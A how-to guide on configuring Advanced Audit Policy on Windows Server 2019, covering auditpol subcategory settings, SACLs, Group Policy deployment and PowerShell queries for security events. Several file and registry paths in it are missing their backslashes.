How to Configure Advanced Audit Policy on Windows Server 2019

Introduction to Advanced Audit Policy

Advanced Audit Policy Configuration in Windows Server 2019 provides granular control over security auditing beyond the basic nine audit categories available in legacy audit policy settings. Using Advanced Audit Policy, administrators can enable individual subcategories independently, allowing specific events to be audited without enabling entire categories that generate excessive log volume. Windows Server 2019 includes 58 subcategories across 10 categories covering logon events, object access, process tracking, privilege use, account management, directory service events, and system events. Proper audit policy configuration is fundamental to security monitoring, incident response, and compliance with frameworks such as NIST, PCI DSS, ISO 27001, and HIPAA.

Understanding Audit Policy Categories and Subcategories

The Advanced Audit Policy is organized into 10 categories. Account Logon covers Kerberos authentication service, Kerberos service ticket operations, and credential validation. Account Management covers user, computer, and group account changes. Detailed Tracking covers process creation, termination, and DPAPI activity. DS Access covers Active Directory object access and replication. Logon/Logoff covers logon events, special logon, account lockouts, and IPsec events. Object Access covers file system, registry, kernel object, and SAM access. Policy Change covers audit policy changes and authentication policy changes. Privilege Use covers sensitive and non-sensitive privilege use. System covers security state changes, security system extension, and system integrity events. Global Object Access Auditing covers SACL-based auditing at the OS level.

Viewing Current Audit Policy

Check the current advanced audit policy configuration using auditpol:

auditpol /get /category:*
auditpol /get /category:"Logon/Logoff"
auditpol /get /subcategory:"Logon"
auditpol /get /subcategory:* | findstr "Success|Failure|No Auditing"

Export the current policy to a file for documentation or backup:

auditpol /backup /file:C:AuditPolicyCurrentPolicy.csv

Configuring Account Logon Auditing

Account logon events track authentication attempts at the domain controller. These events are critical for detecting brute force attacks, credential stuffing, and unauthorized access. Enable success and failure auditing for all account logon subcategories:

auditpol /set /subcategory:"Kerberos Authentication Service" /success:enable /failure:enable
auditpol /set /subcategory:"Kerberos Service Ticket Operations" /success:enable /failure:enable
auditpol /set /subcategory:"Credential Validation" /success:enable /failure:enable
auditpol /set /subcategory:"Other Account Logon Events" /success:enable /failure:enable

Key event IDs generated: 4768 (Kerberos TGT request), 4769 (Kerberos service ticket request), 4771 (Kerberos pre-authentication failed), 4776 (NTLM authentication), 4625 (logon failure).

Configuring Account Management Auditing

Account management events detect creation, modification, and deletion of user accounts, security groups, and computer accounts. These are essential for detecting unauthorized privilege escalation and account manipulation:

auditpol /set /subcategory:"User Account Management" /success:enable /failure:enable
auditpol /set /subcategory:"Computer Account Management" /success:enable /failure:enable
auditpol /set /subcategory:"Security Group Management" /success:enable /failure:enable
auditpol /set /subcategory:"Distribution Group Management" /success:enable /failure:enable
auditpol /set /subcategory:"Application Group Management" /success:enable /failure:enable
auditpol /set /subcategory:"Other Account Management Events" /success:enable /failure:enable

Key event IDs: 4720 (user account created), 4726 (user account deleted), 4728 (member added to security group), 4732 (member added to local group), 4756 (member added to universal group), 4738 (user account changed), 4722 (user account enabled), 4725 (user account disabled).

Configuring Logon and Logoff Auditing

Logon/Logoff events are among the most important for incident response, recording every interactive, network, service, and batch logon and logoff. Enable comprehensive logon auditing:

auditpol /set /subcategory:"Logon" /success:enable /failure:enable
auditpol /set /subcategory:"Logoff" /success:enable
auditpol /set /subcategory:"Account Lockout" /failure:enable
auditpol /set /subcategory:"Special Logon" /success:enable
auditpol /set /subcategory:"Other Logon/Logoff Events" /success:enable /failure:enable
auditpol /set /subcategory:"Network Policy Server" /success:enable /failure:enable

Key event IDs: 4624 (successful logon), 4625 (failed logon), 4634 (logoff), 4647 (user-initiated logoff), 4648 (logon with explicit credentials), 4672 (special privileges assigned), 4740 (account locked out).

Configuring Object Access Auditing

Object Access auditing tracks access to files, folders, registry keys, and other securable objects. You must both enable the policy and configure a System Access Control List (SACL) on the objects to audit. Enable the policy subcategories:

auditpol /set /subcategory:"File System" /success:enable /failure:enable
auditpol /set /subcategory:"Registry" /success:enable /failure:enable
auditpol /set /subcategory:"Kernel Object" /success:enable /failure:enable
auditpol /set /subcategory:"SAM" /failure:enable
auditpol /set /subcategory:"Removable Storage" /success:enable /failure:enable
auditpol /set /subcategory:"File Share" /success:enable /failure:enable
auditpol /set /subcategory:"Detailed File Share" /failure:enable

Configure SACL on a sensitive folder using PowerShell to audit all access:

$acl = Get-Acl -Path "D:SensitiveData"
$auditRule = New-Object System.Security.AccessControl.FileSystemAuditRule("Everyone", "FullControl", "ContainerInherit,ObjectInherit", "None", "Success,Failure")
$acl.AddAuditRule($auditRule)
Set-Acl -Path "D:SensitiveData" -AclObject $acl

Configuring Process Creation Auditing

Process Creation auditing (event ID 4688) records every new process, including the command line arguments, making it invaluable for detecting malware execution, lateral movement, and living-off-the-land attacks. Enable with command line logging:

auditpol /set /subcategory:"Process Creation" /success:enable
auditpol /set /subcategory:"Process Termination" /success:enable

Enable command line logging in process creation events via Group Policy: Computer Configuration > Administrative Templates > System > Audit Process Creation > Include command line in process creation events = Enabled. Or via registry:

reg add "HKLMSOFTWAREMicrosoftWindowsCurrentVersionPoliciesSystemAudit" /v "ProcessCreationIncludeCmdLine_Enabled" /t REG_DWORD /d 1 /f

Configuring Policy Change Auditing

Policy change events detect modifications to audit policies, authentication policies, and trust relationships. Essential for detecting policy tampering and privilege escalation:

auditpol /set /subcategory:"Audit Policy Change" /success:enable /failure:enable
auditpol /set /subcategory:"Authentication Policy Change" /success:enable
auditpol /set /subcategory:"Authorization Policy Change" /success:enable
auditpol /set /subcategory:"MPSSVC Rule-Level Policy Change" /success:enable /failure:enable
auditpol /set /subcategory:"Filtering Platform Policy Change" /success:enable /failure:enable

Key event IDs: 4719 (system audit policy changed), 4907 (auditing settings changed), 4670 (permissions on object changed), 4715 (audit policy on object changed).

Deploying Audit Policy via Group Policy

Use Group Policy to deploy and enforce advanced audit policy settings across multiple servers. In Group Policy Management, create or edit a GPO and navigate to Computer Configuration > Windows Settings > Security Settings > Advanced Audit Policy Configuration. Configure each subcategory. Enforce the policy to prevent local override. Apply the GPO to the Servers OU and verify policy application:

gpupdate /force
gpresult /r /scope computer | findstr -i "audit"
auditpol /get /category:* | Out-File C:ReportsAuditPolicy_$(Get-Date -Format yyyyMMdd).txt

Prevent local audit policy from overriding Group Policy settings:

secedit /configure /db secedit.sdb /cfg "C:TemplatesAuditPolicy.inf" /areas SECURITYPOLICY /overwrite /quiet

Querying Security Events with PowerShell

Use PowerShell to query the Security event log for specific events of interest. Find all failed logon attempts in the last 24 hours:

$startTime = (Get-Date).AddHours(-24)
Get-WinEvent -FilterHashtable @{LogName='Security'; Id=4625; StartTime=$startTime} | ForEach-Object {
    $xml = [xml]$_.ToXml()
    [PSCustomObject]@{
        Time = $_.TimeCreated
        User = $xml.Event.EventData.Data | Where-Object {$_.Name -eq "TargetUserName"} | Select-Object -ExpandProperty '#text'
        IP = $xml.Event.EventData.Data | Where-Object {$_.Name -eq "IpAddress"} | Select-Object -ExpandProperty '#text'
        LogonType = $xml.Event.EventData.Data | Where-Object {$_.Name -eq "LogonType"} | Select-Object -ExpandProperty '#text'
    }
} | Sort-Object User | Format-Table -AutoSize

Find all accounts added to privileged groups in the last 7 days:

Get-WinEvent -FilterHashtable @{LogName='Security'; Id=@(4728,4732,4756); StartTime=(Get-Date).AddDays(-7)} | Select-Object TimeCreated, Message | Format-List